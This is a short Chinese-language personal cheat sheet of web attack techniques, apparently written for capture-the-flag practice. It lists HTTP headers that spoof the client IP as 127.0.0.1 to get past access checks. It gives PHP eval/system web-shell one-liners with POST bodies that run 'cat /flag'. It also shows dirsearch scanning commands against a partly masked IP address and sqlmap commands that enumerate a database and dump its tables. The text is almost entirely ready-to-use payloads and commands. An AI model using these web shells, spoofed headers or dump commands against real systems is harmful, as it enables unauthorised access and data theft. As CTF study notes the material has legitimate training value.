无星的安全之旅（六）——http信息

信息备注自己快查

记录来自哪个网站

X-Forwarded-For:127.0.0.1
 
X-Forwarded:127.0.0.1
 
Forwarded-For:127.0.0.1
 
Forwarded:127.0.0.1
 
X-Forwarded-Host:127.0.0.1
 
X-remote-IP:127.0.0.1
 
X-remote-addr:127.0.0.1
 
True-Client-IP:127.0.0.1
 
X-Client-IP:127.0.0.1
 
Client-IP:127.0.0.1
 
X-Real-IP:127.0.0.1
 
Ali-CDN-Real-IP:127.0.0.1
 
Cdn-Src-Ip:127.0.0.1
 
Cdn-Real-Ip:127.0.0.1
 
CF-Connecting-IP:127.0.0.1
 
X-Cluster-Client-IP:127.0.0.1
 
WL-Proxy-Client-IP:127.0.0.1
 
Proxy-Client-IP:127.0.0.1
 
Fastly-Client-Ip:127.0.0.1
 
True-Client-Ip:127.0.0.1

Host: 127.0.0.1

Hackbar

php请求

postform,&符分割,System里面可以任意写

eval(system($_POST['cmd'])); 

password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=cat /flag

postform,&符分割,System里面可以任意写

eval($_POST['cmd']); 

password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=system("cat /flag")

dirsearch

扫描

python dirsearch.py -u http://222.93.xx.xx:8090

指定字典扫描

python dirsearch.py -u http://222.93.xx.xx:8090 -w dic.txt

保留200

python dirsearch.py -u http://222.93.xx.xx:8090 -i 200

批量地址扫描

python dirsearch.py -l url.txt -i 200

如果遇到https问题

打开burp，然后设置代理到本机即可

代理

python dirsearch.py -l url.txt -i 200 --proxy=localhost:8080

代理池

python dirsearch.py -l url.txt -i 200 --proxy-file=/path/to/proxies.txt

sqlmap

如果链接不上，尝试换个网络看看

扫描接口

python sqlmap.py -u "http://xxxx?tidId=1"

参数好多，只扫某些

python sqlmap.py -u "http://xxxx?tidId=1&id=2&pp=3" -p "tidId,id"

ssl问题，同样开burp

python sqlmap.py -u "http://xxxx?tidId=1&id=2&pp=3" -p "tidId,id" -proxy "http://127.0.0.1:8080" --force-ssl

查看所有的数据库

python sqlmap.py -u http://xxx/index.php?id=1 --dbs

查看数据中的列表

python sqlmap.py -u http://xxx/index.php?id=1 -D mysql -tables

查看表中的字段

python sqlmap.py -u http://xxx/index.php?id=1 -D database数据库名 -T table表名 --columns

查看字段内容

python sqlmap.py -u http://xxx/index.php?id=1 -D database数据库名 -T table表名 -C colunm列名 --dump

配置详情

-p 指定测试参数
-b 获取banner
--is-dba 是否为管理员权限
--current-user 查看当前数据库
--current-user 查看当前用户
--count 检索所有数据数量
--level 测试等级（1-5）默认为1
-v 显示详细信息
-D 指定数据库
-T 指定表
-C 指定列
（大写）